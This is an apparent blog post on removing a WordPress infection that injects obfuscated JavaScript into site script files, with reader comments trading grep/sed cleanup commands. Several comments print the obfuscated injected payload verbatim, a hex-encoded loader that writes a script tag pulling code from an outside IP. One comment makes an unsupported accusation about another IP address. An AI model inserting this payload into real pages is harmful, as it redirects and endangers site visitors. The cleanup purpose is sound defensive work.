removing wordpress malware infecting js files.

A recent WordPress malware is targeting WordPress websites by injecting a piece of malicious code into every single JavaScript files (mostly libraries specially Jquery) which acts maliciously by redirecting the visitors to advertising affiliate sites.

Example injected code:

Well I came to know about this when a client approached me to clean his hacked website. after looking for this pattern within the files on his WordPress directory I came to find that over 600 Javascript files were injected with the code above.

I have gotten the above result by doing a grep in the public_html folder. following command was used to do a recursive grep looking for matching malicious variable name:

looking at the above commands result I found a file named db.php was uploaded to one of the plugins folder which a simple get request to that php file would case of that mass injection to all javascript files.

now lets get rid of the bad stuff in all files by using sed in combination of grep command as below:

This will remove the pattern from each single file that contains it.

 

Incoming search terms:

  • https://hazaveh net/2017/02/removing-wordpress-malware-infecting-js-files/
  • https://yandex ru/clck/jsredir?from=yandex ru;search;web;;&text=&etext=1835 CiGfGuU2ao40SDvubJnd7_lcxMapruAOWD5LCQYPHAV7Uc7AV5I4ZenAYXrIXHjv d0dfbc0346dbc9792fe15682ba7fe380cdb66c6a&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXme
  • \x34\x32\x2E
  • _0xaae8 database

21 thoughts on “removing wordpress malware infecting js files.”

  1. Hi,

    It is really very helpful to remove malware. But I have tried below command it is not removing from the js only changed the file modified date.

    I think sed command not recognize the backslash ( \ ).

    grep -rl ‘_0xaae8’ . | xargs sed -i ‘s/var _0xaae8=[“”,”\x6A\x6F\x69\x6E”,”\x72\x65\x76\x65\x72\x73\x65″,”\x73\x70\x6C\x69\x74″,”\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C”,”\x77\x72\x69\x74\x65″];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))/ /g’

    Please help me to run this command.

    Once again thank you.

  2. Hello
    I also have the issue. I make the php file in the public html , but cant use it and dont know how to run.
    Can anyone help me?

  3. Hi have the below code in all the .js files.

    var _0xaae8=[“”,”\x6A\x6F\x69\x6E”,”\x72\x65\x76\x65\x72\x73\x65″,”\x73\x70\x6C\x69\x74″,”\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C”,”\x77\x72\x69\x74\x65″];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

    Please share the exact query which needs to be executed.

  4. If anyone still has problem, below is the escaped version:

    grep -rl ‘_0xaae8’ . | xargs sed -i ‘s/var _0xaae8=\[“”,”\\x6A\\x6F\\x69\\x6E”,”\\x72\\x65\\x76\\x65\\x72\\x73\\x65″,”\\x73\\x70\\x6C\\x69\\x74″,”\\x3E\\x74\\x70\\x69\\x72\\x63\\x73\\x2F\\x3C\\x3E\\x22\\x73\\x6A\\x2E\\x79\\x72\\x65\\x75\\x71\\x6A\\x2F\\x38\\x37\\x2E\\x36\\x31\\x31\\x2E\\x39\\x34\\x32\\x2E\\x34\\x33\\x31\\x2F\\x2F\\x3A\\x70\\x74\\x74\\x68\\x22\\x3D\\x63\\x72\\x73\\x20\\x74\\x70\\x69\\x72\\x63\\x73\\x3C”,”\\x77\\x72\\x69\\x74\\x65″\];document\[_0xaae8\[5\]\](_0xaae8\[4\]\[_0xaae8\[3\]\](_0xaae8\[0\])\[_0xaae8\[2\]\]()\[_0xaae8\[1\]\](_0xaae8\[0\]))/ /g’

  5. thanks worked for me like a charm

    question. how can I find the db.php file and avoid to create it again?

  6. how to remove this error
    var _0xaae8=[“”,”\x6A\x6F\x69\x6E”,”\x72\x65\x76\x65\x72\x73\x65″,”\x73\x70\x6C\x69\x74″,”\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C”,”\x77\x72\x69\x74\x65″];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]));

  7. what if we just replace or remove the ‘var _0xaae8’ rather than the entire code .. that should disable the code .. isnt it?

  8. yes that should stop it, but leaving the rest of the code there to me is like killing a rat invaded your house and leaving the body there 🙂

  9. Just curious .. how can I decode this “var _0xaae8=[“”,”\x6A\x6F\x69\x6E”,”\x72\x65\x76\x65\x72\x73\x65″,”\x73\x70\x6C\x69\x74″,”\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C”,”\x77\x72\x69\x74\x65″];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))”

    I want to know what the code means. Is there any online service to decode it?

  10. This malware hacks your server and replace all the js for all the projects on server.
    You cannot remove this by just find and replace.
    Please search for the concrete solution. I have replaced all my projects and their js by backup but the problem still persists. There is a replace script on server that we all should find and kill.
    Waiting for responses from you guyz. If I get something, will update you

  11. the injection can be in different file in different case. hopefully my tutorial can give some overall insights on what causes the problem and how to solve it.

  12. 178.137.87.165 is an Ukrainian hacker who attacks every WordPress site he come across for 50+ times and annoys every developer. Please block this IP as little step to prevention

Leave a Reply